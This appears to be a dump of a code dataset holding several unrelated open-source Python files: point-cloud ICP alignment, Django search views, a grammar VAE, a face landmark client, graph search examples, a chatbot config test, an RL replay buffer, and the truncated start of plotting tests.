id
stringlengths
1
265
text
stringlengths
6
5.19M
dataset_id
stringclasses
7 values
1645162
''' . . . . . . . . . . . . . . . . . . . . . . . . << >< >< >< << . . < >< ><< ><<< >< ><< . . << >< > >< >< >< >< . . << >< >< ><<<<<>< >< . . << >< ><< ><< >< ><< . . << ><><< ><< >< << . . . . DFAB 2016/17 . . . . . . . . . . . . . . . . . . . . . . Created on 22.03.2017 @author: rustr ''' import numpy as np from scipy.spatial.distance import cdist def best_fit_transform(A, B): ''' Calculates the least-squares best-fit transform between corresponding 3D points A->B Input: A: Nx3 numpy array of corresponding 3D points B: Nx3 numpy array of corresponding 3D points Returns: T: 4x4 homogeneous transformation matrix R: 3x3 rotation matrix t: 3x1 column vector ''' assert len(A) == len(B) # translate points to their centroids centroid_A = np.mean(A, axis=0) centroid_B = np.mean(B, axis=0) AA = A - centroid_A BB = B - centroid_B # rotation matrix H = np.dot(AA.T, BB) U, S, Vt = np.linalg.svd(H) R = np.dot(Vt.T, U.T) # special reflection case if np.linalg.det(R) < 0: Vt[2,:] *= -1 R = np.dot(Vt.T, U.T) # translation t = centroid_B.T - np.dot(R,centroid_A.T) # homogeneous transformation T = np.identity(4) T[0:3, 0:3] = R T[0:3, 3] = t return T, R, t def nearest_neighbor(src, dst): ''' Find the nearest (Euclidean) neighbor in dst for each point in src Input: src: Nx3 array of points dst: Nx3 array of points Output: distances: Euclidean distances of the nearest neighbor indices: dst indices of the nearest neighbor ''' all_dists = cdist(src, dst, 'euclidean') indices = all_dists.argmin(axis=1) distances = all_dists[np.arange(all_dists.shape[0]), indices] return distances, indices def icp(A, B, init_guess=None, max_iterations=20, tolerance=0.001): ''' The Iterative Closest Point method Input: A: Nx3 numpy array of source 3D points B: Nx3 numpy array of destination 3D point init_guess: 4x4 homogeneous transformation max_iterations: exit algorithm after max_iterations tolerance: convergence criteria Output: T: final homogeneous transformation distances: Euclidean distances (errors) of the nearest neighbor reference: https://github.com/ClayFlannigan/icp/blob/master/icp.py ''' # make points homogeneous, copy them so as to maintain the originals src = np.ones((4,A.shape[0])) dst = np.ones((4,B.shape[0])) src[0:3,:] = np.copy(A.T) dst[0:3,:] = np.copy(B.T) # apply the initial pose estimation if init_guess is not None: src = np.dot(init_guess, src) prev_error = 0 for i in range(max_iterations): # find the nearest neighbours between the current source and destination points distances, indices = nearest_neighbor(src[0:3,:].T, dst[0:3,:].T) # compute the transformation between the current source and nearest destination points T,_,_ = best_fit_transform(src[0:3,:].T, dst[0:3,indices].T) # update the current source src = np.dot(T, src) # check error mean_error = np.sum(distances) / distances.size if abs(prev_error-mean_error) < tolerance: break prev_error = mean_error # calculate final transformation T,_,_ = best_fit_transform(A, src[0:3,:].T) return T, distances if __name__ == "__main__": #dataA = [[-36.135, -1273.399, 8.321], [0.0, 0.0, 0.0], [49.187, -874.668, 8.534000000000001], [106.173, -468.376, 8.750999999999999], [133.328, -1251.509, 5.334], [217.033, -842.73, 5.553], [270.129, -420.269, 5.778], [499.999, -0.017999999999999999, 0.0040000000000000001]] #dataB = [[1014.74, -590.91, -767.45], [1092.76, -743.6, -770.22], [1420.28, -537.33, -767.88], [1507.31, -685.55, -770.85], [1823.42, -454.48, -768.71], [1924.34, -593.59, -771.24], [2229.307, -198.723, -777.062], [2398.372, -669.331, -777.991]] dataB = [[217.065, -842.72, 6.0], [133.375, -1251.501, 6.0], [33.678, -1648.955, 6.0], [-202.497, -1524.802, 9.0], [-133.45, -1250.583, 9.0], [-49.337, -857.741, 9.0]] dataA = [[24.742, -1652.137, 0.443], [-211.224, -1529.061, 3.78], [-141.752, -1253.421, 3.667], [125.177, -1253.606, 0.60599999999999998], [209.802, -843.907, 1.881], [-57.661, -858.78, 4.697]] A = np.array(dataA) B = np.array(dataB) print A.shape print B.shape print init_guess = np.array([[0.4383711467890774, 0.89879404629916704, 0.0, 2026.0682179097259], [-0.89879404629916704, 0.4383711467890774, 0.0, 567.64015907666817], [0.0, 0.0, 1.0, 0.0], [0.0, 0.0, 0.0, 1.0]]) #Run the icp #T, distances = icp(A, B, init_guess, max_iterations=20) T, distances = icp(A, B) # for pasting into Rhino print "T = rg.Transform.Identity" for i in range(4): for j in range(4): print "T.M%i%i = %f" % (i,j,T[i,j]) print print T print distances
StarcoderdataPython
101807
<gh_stars>1-10 from operator import itemgetter from django.shortcuts import render from django.contrib.postgres.search import SearchVector from activities.models import Activity, MetadataOption,ActivityTranslation from .forms import SearchForm def _pimp_facets(facets): # create a cache of MetadataOption options = {} for obj in MetadataOption.objects.all(): options[(obj.code, obj.group)] = (obj.code, obj.title, obj.position) # go through the search result facets, to sort them and add the title for facet, values in facets['fields'].items(): if facet != 'keywords': new_values = [] for code, count in values: # obj = MetadataOption.objects.get(code=code, group=facet) # new_values.append((code, obj.title, count, obj.position)) opt = options[(code, facet)] new_values.append((code, opt[1], count, opt[2])) # sort by the position field facets['fields'][facet] = sorted(new_values, key=itemgetter(3)) return facets def simplesearch(request): form = SearchForm(request.GET) if form.is_valid(): search_query = form.cleaned_data['q'] search_result = ActivityTranslation.objects.annotate(search=SearchVector('title','description', 'keywords')).filter(search=search_query) context = { 'query': search_query, 'page': {'object_list': search_result}, 'request': request, 'form': form, } else: context = { 'request': request, 'form': form, } if 'page' not in context or not context['page']['object_list']: context['featured'] = Activity.objects.featured().active_translations()[0:3] return render(request, 'search/simplesearch.html', context) def search(request): form = SearchForm(request.GET) if form.is_valid(): search_query = form.cleaned_data['q'] search_result = whoosh_utils.search(search_query, request.LANGUAGE_CODE, queryfacets=form.cleaned_data) context = { 'query': search_query, 'facets': _pimp_facets(search_result['facets']), 'page': {'object_list': search_result['results']}, 'request': request, 'form': form, } else: context = { 'request': request, 'form': form, } if 'page' not in context or not context['page']['object_list']: context['featured'] = Activity.objects.featured().active_translations()[0:3] return render(request, 'search/search.html', context)
StarcoderdataPython
4806320
<gh_stars>10-100 import re import nltk import collections import numpy as np from weighted_retraining.expr import eq_grammar, expr_model def tokenize(s): funcs = ['sin', 'exp'] for fn in funcs: s = s.replace(fn+'(', fn+' ') s = re.sub(r'([^a-z ])', r' \1 ', s) for fn in funcs: s = s.replace(fn, fn+'(') return s.split() def pop_or_nothing(S): try: return S.pop() except: return 'Nothing' def prods_to_eq(prods): seq = [prods[0].lhs()] for prod in prods: if str(prod.lhs()) == 'Nothing': break for ix, s in enumerate(seq): if s == prod.lhs(): seq = seq[:ix] + list(prod.rhs()) + seq[ix+1:] break try: return ''.join(seq) except: return '' def string_to_one_hot(x_str, data_map, n_entries, max_len): """ convert string representation to one-hot representation """ indices = [np.array([data_map[e] for e in entry], dtype=int) for entry in x_str] one_hot = np.zeros((len(indices), max_len, n_entries), dtype=np.float32) for i in range(len(indices)): num_productions = len(indices[i]) one_hot[i][np.arange(num_productions), indices[i]] = 1. one_hot[i][np.arange(num_productions, max_len), -1] = 1. return one_hot class EquationGrammarModel(object): def __init__(self, weights_file, latent_rep_size=25): """ Load the (trained) equation encoder/decoder, grammar model. """ self._grammar = eq_grammar self._model = expr_model self.MAX_LEN = 15 self._productions = self._grammar.GCFG.productions() self._prod_map = {} for ix, prod in enumerate(self._productions): self._prod_map[prod] = ix self._parser = nltk.ChartParser(self._grammar.GCFG) self._tokenize = tokenize self._n_chars = len(self._productions) self._lhs_map = {} for ix, lhs in enumerate(self._grammar.lhs_list): self._lhs_map[lhs] = ix self.vae = self._model.EquationVAE() self.vae.load(self._productions, weights_file, max_length=self.MAX_LEN, latent_rep_size=latent_rep_size) def encode(self, smiles): """ Encode a list of smiles strings into the latent space """ one_hot = self.smiles_to_one_hot(smiles) self.one_hot = one_hot return self.vae.encoderMV.predict(one_hot)[0] def smiles_to_one_hot(self, smiles): """ convert smiles to one-hot vectors """ assert type(smiles) == list tokens = list(map(self._tokenize, smiles)) parse_trees = [next(self._parser.parse(t)) for t in tokens] productions_seq = [tree.productions() for tree in parse_trees] return string_to_one_hot(productions_seq, self._prod_map, self._n_chars, self.MAX_LEN) def _sample_using_masks(self, unmasked): """ Samples a one-hot vector, masking at each timestep. This is an implementation of Algorithm ? in the paper. """ eps = 1e-100 X_hat = np.zeros_like(unmasked) # Create a stack for each input in the batch S = np.empty((unmasked.shape[0],), dtype=object) for ix in range(S.shape[0]): S[ix] = [str(self._grammar.start_index)] # Loop over time axis, sampling values and updating masks for t in range(unmasked.shape[1]): next_nonterminal = [self._lhs_map[pop_or_nothing(a)] for a in S] mask = self._grammar.masks[next_nonterminal] masked_output = np.exp(unmasked[:, t, :])*mask + eps sampled_output = np.argmax(np.random.gumbel( size=masked_output.shape) + np.log(masked_output), axis=-1) X_hat[np.arange(unmasked.shape[0]), t, sampled_output] = 1.0 # Identify non-terminals in RHS of selected production, and # push them onto the stack in reverse order rhs = [[a for a in self._productions[i].rhs() if (type(a) == nltk.grammar.Nonterminal) and (str(a) != 'None')] for i in sampled_output] for ix in range(S.shape[0]): S[ix].extend(list(map(str, rhs[ix]))[::-1]) return X_hat # , ln_p def decode(self, z): """ Sample from the grammar decoder """ assert z.ndim == 2 unmasked = self.vae.decoder.predict(z) X_hat = self._sample_using_masks(unmasked) # Convert from one-hot to sequence of production rules prod_seq = [[self._productions[X_hat[index, t].argmax()] for t in range(X_hat.shape[1])] for index in range(X_hat.shape[0])] return [prods_to_eq(prods) for prods in prod_seq] def decode_from_latent_space(self, zs, n_decode_attempts=1): """ decode from latents to inputs and set all invalid inputs to None """ # decode equations and replace all empty ones (i.e. '') by None decoded_equations = [self.decode(zs) for _ in range(n_decode_attempts)] valid_equations = [] for i in range(n_decode_attempts): valid_equations.append([]) for j in range(zs.shape[0]): eq = np.array([decoded_equations[i][j]]).astype('str')[0] valid_equations[i].append(None if eq == '' else eq) # if the different decoding attempts yielded different equations, pick the majority valid_equations = np.array(valid_equations) final_equations = [] for i in range(zs.shape[0]): aux = collections.Counter(valid_equations[~np.equal(valid_equations[:, i], None), i]) eq = list(aux.items())[np.argmax(list(aux.values()))][0] if len(aux) > 0 else None final_equations.append(eq) return np.array(final_equations)
StarcoderdataPython
3263828
import jsonrpcclient import sys import os import argparse import base64 from services import registry from .snet import snet_setup def main(): script_name = sys.argv[0] parser = argparse.ArgumentParser(prog=script_name) server_name = "_".join(os.path.splitext(os.path.basename(script_name))[0].split('_')[:2]) + "_server" default_endpoint = "http://127.0.0.1:{}".format(registry[server_name]['jsonrpc']) parser.add_argument("--endpoint", help="jsonrpc server to connect to", default=default_endpoint, type=str, required=False) parser.add_argument("--snet", help="call service on SingularityNet - requires configured snet CLI", action='store_true') parser.add_argument("--image", help="path to image to apply face landmark prediction on", type=str, required=True) parser.add_argument("--model", help="face landmark algorithm to request", type=str, action='store', choices=['5', '68']) parser.add_argument("--out-image", help="Render landmarks on image and save", type=str, required=False) parser.add_argument("--face-bb", help='Specify face bounding box in "x,y,w,h" format', type=str, required=True, action='append') args = parser.parse_args(sys.argv[1:]) with open(args.image, "rb") as f: img_base64 = base64.b64encode(f.read()).decode('ascii') endpoint = args.endpoint bboxes = [] for b in args.face_bb: b = [int(x) for x in b.split(',')] assert len(b) == 4 bboxes.append(dict(x=b[0], y=b[1], w=b[2], h=b[3])) params = {'landmark_model': args.model, "image": img_base64, "face_bboxes": bboxes} if args.snet: endpoint, job_address, job_signature = snet_setup(service_name="face_landmarks") params['job_address'] = job_address params['job_signature'] = job_signature response = jsonrpcclient.request(endpoint, "get_landmarks", **params) if args.out_image: import cv2 import numpy as np print("Rendering landmarks and saving to {}".format(args.out_image)) image = cv2.imread(args.image) for l in response['landmarks']: landmarks = np.matrix([[p['x'], p['y']] for p in l['points']]) for idx, point in enumerate(landmarks): pos = (point[0, 0], point[0, 1]) # annotate the positions cv2.putText(image, str(idx), pos, fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.4, color=(0, 0, 255)) # draw points on the landmark positions cv2.circle(image, pos, 3, color=(0, 255, 255)) cv2.imwrite(args.out_image, image) if __name__ == '__main__': main()
StarcoderdataPython
129084
# -*- coding: utf-8 -*- """ @author: 2series """ class Node(object): def __init__(self, name): """Assumes name is a string""" self.name = name def getName(self): return self.name def __str__(self): return self.name class Edge(object): def __init__(self, src, dest): """Assumes src and dest are nodes""" self.src = src self.dest = dest def getSource(self): return self.src def getDestination(self): return self.dest def __str__(self): return self.src.getName() + '->' + self.dest.getName() class Digraph(object): """edges is a dict mapping each node to a list of its children""" def __init__(self): self.edges = {} def addNode(self, node): if node in self.edges: raise ValueError('Duplicate node') else: self.edges[node] = [] def addEdge(self, edge): src = edge.getSource() dest = edge.getDestination() if not (src in self.edges and dest in self.edges): raise ValueError('Node not in graph') self.edges[src].append(dest) def childrenOf(self, node): return self.edges[node] def hasNode(self, node): return node in self.edges def getNode(self, name): for n in self.edges: if n.getName() == name: return n raise NameError(name) def __str__(self): result = '' for src in self.edges: for dest in self.edges[src]: result = result + src.getName() + '->'\ + dest.getName() + '\n' return result[:-1] #omit final newline class Graph(Digraph): def addEdge(self, edge): Digraph.addEdge(self, edge) rev = Edge(edge.getDestination(), edge.getSource()) Digraph.addEdge(self, rev) def buildCityGraph(graphType): g = graphType() for name in ('Boston', 'Providence', 'New York', 'Chicago', 'Denver', 'Phoenix', 'Los Angeles'): #Create 7 nodes g.addNode(Node(name)) g.addEdge(Edge(g.getNode('Boston'), g.getNode('Providence'))) g.addEdge(Edge(g.getNode('Boston'), g.getNode('New York'))) g.addEdge(Edge(g.getNode('Providence'), g.getNode('Boston'))) g.addEdge(Edge(g.getNode('Providence'), g.getNode('New York'))) g.addEdge(Edge(g.getNode('New York'), g.getNode('Chicago'))) g.addEdge(Edge(g.getNode('Chicago'), g.getNode('Phoenix'))) g.addEdge(Edge(g.getNode('Chicago'), g.getNode('Denver'))) g.addEdge(Edge(g.getNode('Denver'), g.getNode('Phoenix'))) g.addEdge(Edge(g.getNode('Denver'), g.getNode('New York'))) g.addEdge(Edge(g.getNode('Los Angeles'), g.getNode('Boston'))) return g def printPath(path): """Assumes path is a list of nodes""" result = '' for i in range(len(path)): result = result + str(path[i]) if i != len(path) - 1: result = result + '->' return result def DFS(graph, start, end, path, shortest, toPrint = False): """Assumes graph is a Digraph; start and end are nodes; path and shortest are lists of nodes Returns a shortest path from start to end in graph""" path = path + [start] if toPrint: print('Current DFS path:', printPath(path)) if start == end: return path for node in graph.childrenOf(start): if node not in path: #avoid cycles if shortest == None or len(path) < len(shortest): newPath = DFS(graph, node, end, path, shortest, toPrint) if newPath != None: shortest = newPath elif toPrint: print('Already visited', node) return shortest def shortestPath(graph, start, end, toPrint = False): """Assumes graph is a Digraph; start and end are nodes Returns a shortest path from start to end in graph""" return DFS(graph, start, end, [], None, toPrint) def testSP(source, destination): g = buildCityGraph(Digraph) sp = shortestPath(g, g.getNode(source), g.getNode(destination), toPrint = True) if sp != None: print('Shortest path from', source, 'to', destination, 'is', printPath(sp)) else: print('There is no path from', source, 'to', destination) #testSP('Chicago', 'Boston') testSP('Boston', 'Phoenix') def BFS(graph, start, end, toPrint = False): """Assumes graph is a Digraph; start and end are nodes Returns a shortest path from start to end in graph""" initPath = [start] pathQueue = [initPath] while len(pathQueue) != 0: #Get and remove oldest element in pathQueue tmpPath = pathQueue.pop(0) if toPrint: print('Current BFS path:', printPath(tmpPath)) lastNode = tmpPath[-1] if lastNode == end: return tmpPath for nextNode in graph.childrenOf(lastNode): if nextNode not in tmpPath: newPath = tmpPath + [nextNode] pathQueue.append(newPath) return None def shortestPath(graph, start, end, toPrint = False): """Assumes graph is a Digraph; start and end are nodes Returns a shortest path from start to end in graph""" return BFS(graph, start, end, toPrint) testSP('Boston', 'Phoenix') #def cost(path): # result = 0 # for i in range(len(path)): # result += str(path[i]) # if i != len(path) - 1: # result = result + '->' # return result # # #def DFS(graph, start, end, path, shortest, toPrint = False): # """Assumes graph is a Digraph; start and end are nodes; # path and shortest are tuples containing a list of # nodes and a cost # Returns a shortest path from start to end in graph""" # path = (path + [start], 0) # if toPrint: # print('Current DFS path:', printPath(path[0])) # if start == end: # return path # for node in graph.childrenOf(start): # if node not in path: #avoid cycles # if shortest == None or cost(path) < cost(shortest): # newPath = DFS(graph, node, end, path, shortest, # toPrint) # if newPath != None: # shortest = newPath # #def testSP(): # nodes = [] # for name in ('Boston', 'Providence', 'New York', 'Chicago', # 'Denver', 'Phoenix', 'Los Angeles'): #Create 6 nodes # nodes.append(Node(str(name))) # g = Digraph() # for n in nodes: # g.addNode(n) # g.addEdge(WeightedEdge(nodes[0],nodes[1])) # g.addEdge(WeightedEdge(nodes[1],nodes[2])) # g.addEdge(WeightedEdge(nodes[2],nodes[3])) # g.addEdge(WeightedEdge(nodes[2],nodes[4])) # g.addEdge(WeightedEdge(nodes[3],nodes[4])) # g.addEdge(WeightedEdge(nodes[3],nodes[5])) # g.addEdge(WeightedEdge(nodes[0],nodes[2],10)) # g.addEdge(WeightedEdge(nodes[1],nodes[0])) # g.addEdge(WeightedEdge(nodes[3],nodes[1])) # g.addEdge(WeightedEdge(nodes[4],nodes[0])) # sp = shortestPath(g, nodes[0], nodes[5], toPrint = True) # print('Shortest path is', printPath(sp)) # sp = BFS(g, nodes[0], nodes[5]) # print('Shortest path found by BFS:', printPath(sp)) # #testSP()
StarcoderdataPython
4415
""" Copyright (c) 2020 COTOBA DESIGN, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import unittest from programy.config.file.yaml_file import YamlConfigurationFile from programy.config.brain.oob import BrainOOBConfiguration from programy.clients.events.console.config import ConsoleConfiguration class BrainOOBConfigurationTests(unittest.TestCase): def test_oob_with_data(self): yaml = YamlConfigurationFile() self.assertIsNotNone(yaml) yaml.load_from_text(""" brain: oobs: default: classname: programy.oob.defaults.default.DefaultOutOfBandProcessor """, ConsoleConfiguration(), ".") brain_config = yaml.get_section("brain") self.assertIsNotNone(brain_config) oobs_config = yaml.get_section("oobs", brain_config) self.assertIsNotNone(oobs_config) oob_config = BrainOOBConfiguration("default") oob_config.load_config_section(yaml, oobs_config, ".") self.assertEqual("programy.oob.defaults.default.DefaultOutOfBandProcessor", oob_config.classname) def test_default_without_data(self): yaml = YamlConfigurationFile() self.assertIsNotNone(yaml) yaml.load_from_text(""" brain: oobs: default: """, ConsoleConfiguration(), ".") brain_config = yaml.get_section("brain") self.assertIsNotNone(brain_config) oobs_config = yaml.get_section("oobs", brain_config) self.assertIsNotNone(oobs_config) oob_config = BrainOOBConfiguration("default") oob_config.load_config_section(yaml, oobs_config, ".") self.assertIsNone(oob_config.classname)
StarcoderdataPython
3372280
import mrl import gym from mrl.replays.core.shared_buffer import SharedMemoryTrajectoryBuffer as Buffer import numpy as np import pickle import os from mrl.utils.misc import batch_block_diag class OnlineHERBuffer(mrl.Module): def __init__( self, module_name='replay_buffer' ): """ Buffer that does online hindsight relabeling. Replaces the old combo of ReplayBuffer + HERBuffer. """ super().__init__(module_name, required_agent_modules=['env'], locals=locals()) self.size = None self.goal_space = None self.buffer = None self.save_buffer = None def _setup(self): self.size = self.config.replay_size env = self.env if type(env.observation_space) == gym.spaces.Dict: observation_space = env.observation_space.spaces["observation"] self.goal_space = env.observation_space.spaces["desired_goal"] else: observation_space = env.observation_space items = [("state", observation_space.shape), ("action", env.action_space.shape), ("reward", (1,)), ("next_state", observation_space.shape), ("done", (1,))] if self.goal_space is not None: items += [("previous_ag", self.goal_space.shape), # for reward shaping ("ag", self.goal_space.shape), # achieved goal ("bg", self.goal_space.shape), # behavioral goal (i.e., intrinsic if curious agent) ("dg", self.goal_space.shape)] # desired goal (even if ignored behaviorally) self.buffer = Buffer(self.size, items) self._subbuffers = [[] for _ in range(self.env.num_envs)] self.n_envs = self.env.num_envs # HER mode can differ if demo or normal replay buffer if 'demo' in self.module_name: self.fut, self.act, self.ach, self.beh = parse_hindsight_mode(self.config.demo_her) else: self.fut, self.act, self.ach, self.beh = parse_hindsight_mode(self.config.her) def _process_experience(self, exp): if getattr(self, 'logger'): self.logger.add_tabular('Replay buffer size', len(self.buffer)) done = np.expand_dims(exp.done, 1) # format for replay buffer reward = np.expand_dims(exp.reward, 1) # format for replay buffer action = exp.action if self.goal_space: state = exp.state['observation'] next_state = exp.next_state['observation'] previous_achieved = exp.state['achieved_goal'] achieved = exp.next_state['achieved_goal'] desired = exp.state['desired_goal'] if hasattr(self, 'ag_curiosity') and self.ag_curiosity.current_goals is not None: behavioral = self.ag_curiosity.current_goals # recompute online reward reward = self.env.compute_reward(achieved, behavioral, {'s':state, 'ns':next_state}).reshape(-1, 1) else: behavioral = desired for i in range(self.n_envs): self._subbuffers[i].append([ state[i], action[i], reward[i], next_state[i], done[i], previous_achieved[i], achieved[i], behavioral[i], desired[i] ]) else: state = exp.state next_state = exp.next_state for i in range(self.n_envs): self._subbuffers[i].append( [state[i], action[i], reward[i], next_state[i], done[i]]) for i in range(self.n_envs): if exp.trajectory_over[i]: trajectory = [np.stack(a) for a in zip(*self._subbuffers[i])] self.buffer.add_trajectory(*trajectory) self._subbuffers[i] = [] def sample(self, batch_size, to_torch=True): if hasattr(self, 'prioritized_replay'): batch_idxs = self.prioritized_replay(batch_size) else: batch_idxs = np.random.randint(self.buffer.size, size=batch_size) if self.goal_space: if "demo" in self.module_name: has_config_her = self.config.get('demo_her') else: has_config_her = self.config.get('her') if has_config_her: if self.config.env_steps > self.config.future_warm_up: fut_batch_size, act_batch_size, ach_batch_size, beh_batch_size, real_batch_size = np.random.multinomial( batch_size, [self.fut, self.act, self.ach, self.beh, 1.]) else: fut_batch_size, act_batch_size, ach_batch_size, beh_batch_size, real_batch_size = batch_size, 0, 0, 0, 0 fut_idxs, act_idxs, ach_idxs, beh_idxs, real_idxs = np.array_split(batch_idxs, np.cumsum([fut_batch_size, act_batch_size, ach_batch_size, beh_batch_size])) # Sample the real batch (i.e., goals = behavioral goals) states, actions, rewards, next_states, dones, previous_ags, ags, goals, _ =\ self.buffer.sample(real_batch_size, batch_idxs=real_idxs) # Sample the future batch states_fut, actions_fut, _, next_states_fut, dones_fut, previous_ags_fut, ags_fut, _, _, goals_fut =\ self.buffer.sample_future(fut_batch_size, batch_idxs=fut_idxs) # Sample the actual batch states_act, actions_act, _, next_states_act, dones_act, previous_ags_act, ags_act, _, _, goals_act =\ self.buffer.sample_from_goal_buffer('dg', act_batch_size, batch_idxs=act_idxs) # Sample the achieved batch states_ach, actions_ach, _, next_states_ach, dones_ach, previous_ags_ach, ags_ach, _, _, goals_ach =\ self.buffer.sample_from_goal_buffer('ag', ach_batch_size, batch_idxs=ach_idxs) # Sample the behavioral batch states_beh, actions_beh, _, next_states_beh, dones_beh, previous_ags_beh, ags_beh, _, _, goals_beh =\ self.buffer.sample_from_goal_buffer('bg', beh_batch_size, batch_idxs=beh_idxs) # Concatenate the five states = np.concatenate([states, states_fut, states_act, states_ach, states_beh], 0) actions = np.concatenate([actions, actions_fut, actions_act, actions_ach, actions_beh], 0) ags = np.concatenate([ags, ags_fut, ags_act, ags_ach, ags_beh], 0) goals = np.concatenate([goals, goals_fut, goals_act, goals_ach, goals_beh], 0) next_states = np.concatenate([next_states, next_states_fut, next_states_act, next_states_ach, next_states_beh], 0) # Recompute reward online if hasattr(self, 'goal_reward'): rewards = self.goal_reward(ags, goals, {'s':states, 'ns':next_states}).reshape(-1, 1).astype(np.float32) else: rewards = self.env.compute_reward(ags, goals, {'s':states, 'ns':next_states}).reshape(-1, 1).astype(np.float32) if self.config.get('never_done'): dones = np.zeros_like(rewards, dtype=np.float32) elif self.config.get('first_visit_succ'): dones = np.round(rewards + 1.) else: raise ValueError("Never done or first visit succ must be set in goal environments to use HER.") dones = np.concatenate([dones, dones_fut, dones_act, dones_ach, dones_beh], 0) if self.config.sparse_reward_shaping: previous_ags = np.concatenate([previous_ags, previous_ags_fut, previous_ags_act, previous_ags_ach, previous_ags_beh], 0) previous_phi = -np.linalg.norm(previous_ags - goals, axis=1, keepdims=True) current_phi = -np.linalg.norm(ags - goals, axis=1, keepdims=True) rewards_F = self.config.gamma * current_phi - previous_phi rewards += self.config.sparse_reward_shaping * rewards_F else: # Uses the original desired goals states, actions, rewards, next_states, dones, _ , _, _, goals =\ self.buffer.sample(batch_size, batch_idxs=batch_idxs) if self.config.slot_based_state: # TODO: For now, we flatten according to config.slot_state_dims I, J = self.config.slot_state_dims states = np.concatenate((states[:, I, J], goals), -1) next_states = np.concatenate((next_states[:, I, J], goals), -1) else: states = np.concatenate((states, goals), -1) next_states = np.concatenate((next_states, goals), -1) gammas = self.config.gamma * (1.-dones) elif self.config.get('n_step_returns') and self.config.n_step_returns > 1: states, actions, rewards, next_states, dones = self.buffer.sample_n_step_transitions( batch_size, self.config.n_step_returns, self.config.gamma, batch_idxs=batch_idxs ) gammas = self.config.gamma**self.config.n_step_returns * (1.-dones) else: states, actions, rewards, next_states, dones = self.buffer.sample( batch_size, batch_idxs=batch_idxs) gammas = self.config.gamma * (1.-dones) if hasattr(self, 'state_normalizer'): states = self.state_normalizer(states, update=False).astype(np.float32) next_states = self.state_normalizer( next_states, update=False).astype(np.float32) if to_torch: return (self.torch(states), self.torch(actions), self.torch(rewards), self.torch(next_states), self.torch(gammas)) else: return (states, actions, rewards, next_states, gammas) def __len__(self): return len(self.buffer) def save(self, save_folder): if self.config.save_replay_buf or self.save_buffer: state = self.buffer._get_state() with open(os.path.join(save_folder, "{}.pickle".format(self.module_name)), 'wb') as f: pickle.dump(state, f) def load(self, save_folder): load_path = os.path.join(save_folder, "{}.pickle".format(self.module_name)) if os.path.exists(load_path): with open(load_path, 'rb') as f: state = pickle.load(f) self.buffer._set_state(state) else: self.logger.log_color('WARNING', 'Replay buffer is not being loaded / was not saved.', color='cyan') self.logger.log_color('WARNING', 'Replay buffer is not being loaded / was not saved.', color='red') self.logger.log_color('WARNING', 'Replay buffer is not being loaded / was not saved.', color='yellow') def parse_hindsight_mode(hindsight_mode : str): if 'future_' in hindsight_mode: _, fut = hindsight_mode.split('_') fut = float(fut) / (1. + float(fut)) act = 0. ach = 0. beh = 0. elif 'futureactual_' in hindsight_mode: _, fut, act = hindsight_mode.split('_') non_hindsight_frac = 1. / (1. + float(fut) + float(act)) fut = float(fut) * non_hindsight_frac act = float(act) * non_hindsight_frac ach = 0. beh = 0. elif 'futureachieved_' in hindsight_mode: _, fut, ach = hindsight_mode.split('_') non_hindsight_frac = 1. / (1. + float(fut) + float(ach)) fut = float(fut) * non_hindsight_frac act = 0. ach = float(ach) * non_hindsight_frac beh = 0. elif 'rfaa_' in hindsight_mode: _, real, fut, act, ach = hindsight_mode.split('_') denom = (float(real) + float(fut) + float(act) + float(ach)) fut = float(fut) / denom act = float(act) / denom ach = float(ach) / denom beh = 0. elif 'rfaab_' in hindsight_mode: _, real, fut, act, ach, beh = hindsight_mode.split('_') denom = (float(real) + float(fut) + float(act) + float(ach) + float(beh)) fut = float(fut) / denom act = float(act) / denom ach = float(ach) / denom beh = float(beh) / denom else: fut = 0. act = 0. ach = 0. beh = 0. return fut, act, ach, beh
StarcoderdataPython
154912
<reponame>aniloutdo/Fitness-Gadgets<filename>test_plotter.py<gh_stars>1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- from ..plotting import Plotter, InvalidArgumentsException from datetime import datetime from numpy import array import pytest def test_lineplot_construction(): """Test that instances for lineplots get constructed correctly.""" test_times = array((datetime(2018, 1, 1, 12, 0, 0), datetime(2018, 1, 1, 12, 1, 0), datetime(2018, 1, 1, 12, 2, 0), datetime(2018, 1, 1, 12, 3, 0), datetime(2018, 1, 1, 12, 4, 0), datetime(2018, 1, 1, 12, 5, 0), datetime(2018, 1, 1, 12, 6, 0), datetime(2018, 1, 1, 12, 7, 0), datetime(2018, 1, 1, 12, 8, 0), datetime(2018, 1, 1, 12, 9, 0))) test_values = array((1, 2, 3, 4, 5, 6, 7, 8, 9, 10)) plotter = Plotter('test plot', timestamps=test_times, values=test_values) assert plotter._plotfunc == plotter._line_plot assert (plotter._timestamps == test_times).all() assert (plotter._values == test_values).all() assert plotter._type == 'test plot' def test_histogram_construction(): """Test that instances for histogram plots get constructed correctly.""" test_times = array((datetime(2018, 1, 1, 12, 0, 0), datetime(2018, 1, 1, 12, 1, 0), datetime(2018, 1, 1, 12, 2, 0), datetime(2018, 1, 1, 12, 3, 0), datetime(2018, 1, 1, 12, 4, 0), datetime(2018, 1, 1, 12, 5, 0), datetime(2018, 1, 1, 12, 6, 0), datetime(2018, 1, 1, 12, 7, 0), datetime(2018, 1, 1, 12, 8, 0), datetime(2018, 1, 1, 12, 9, 0))) test_bins = array((1, 2, 3, 4, 5)) test_histogram = array([[1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5]]) plotter = Plotter('test plot', 